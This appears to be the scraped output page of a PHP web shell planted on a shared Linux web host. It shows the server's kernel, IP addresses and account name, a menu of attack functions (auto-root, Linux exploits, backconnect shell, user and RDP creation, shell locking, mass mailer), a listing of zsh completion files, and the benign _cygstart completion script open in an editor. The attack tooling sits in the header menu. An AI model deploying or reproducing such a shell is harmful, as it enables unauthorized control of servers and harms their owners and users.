Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
zsh /
functions /
Completion /
Cygwin /
[ HOME SHELL ]
Name
Size
Permission
Action
_cygcheck
2
KB
-rw-r--r--
_cygpath
2.55
KB
-rw-r--r--
_cygrunsrv
2.71
KB
-rw-r--r--
_cygserver
1.5
KB
-rw-r--r--
_cygstart
2.13
KB
-rw-r--r--
_dumper
377
B
-rw-r--r--
_getclip
532
B
-rw-r--r--
_mkshortcut
1.24
KB
-rw-r--r--
_mkzsh
371
B
-rw-r--r--
_pscp
716
B
-rw-r--r--
_putclip
538
B
-rw-r--r--
_readshortcut
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _cygstart
#compdef cygstart cygstart.exe # cygwin 1.5.25 _arguments -s -S \ '(--action -a)'{-a,--action=-}'[use specified action instead of default]:action:(open edit explore print find)' \ '(--open -o)'{-o,--open}'[short for: --action open]' \ '(--explore -x)'{-x,--explore}'[short for: --action explore]' \ '(--edit -e)'{-e,--edit}'[short for: --action edit]' \ '(--find -f)'{-f,--find}'[short for: --action find]' \ '(--print -p)'{-p,--print}'[short for: --action print]' \ '(--directory -d)'{-d,--directory=-}'[set working directory]:directory:_directories' \ '--hide[hides the window and activates another window]' \ '--maximize[maximizes the specified window]' \ '--minimize[minimizes the specified window and activates the next top-level window in the z-order]' \ '--restore[activates and displays the window. If the window is minimized or maximized, Windows restores it to its original size and position. An application should specify this flag when restoring a minimized window]' \ '--show[activates the window and displays it in its current size and position]' \ '--showmaximized[activates the window and displays it as a maximized window]' \ '--showminimized[activates the window and displays it as a minimized window]' \ '--showminnoactive[displays the window as a minimized window. The active window remains active]' \ '--showna[displays the window in its current state. The active window remains active]' \ '--shownoactivate[displays a window in its most recent size and position. The active window remains active]' \ '--shownormal[activates and displays a window. If the window is minimized or maximized, Windows restores it to its original size and position. An application should specify this flag when displaying the window for the first time]' \ '(--help -?)'{-\?,--help}'[display help information]' \ '--usage[display brief usage message]' \ '--version[display version information]' \ '--license[display licensing information]' \ '--reference[open MSDN reference for ShellExecute]' \ '1:file: _alternative "programs:program: _command_names -e" "files:file:_files" "urls:URL:_urls"' \ '*::program arguments: _normal'
Close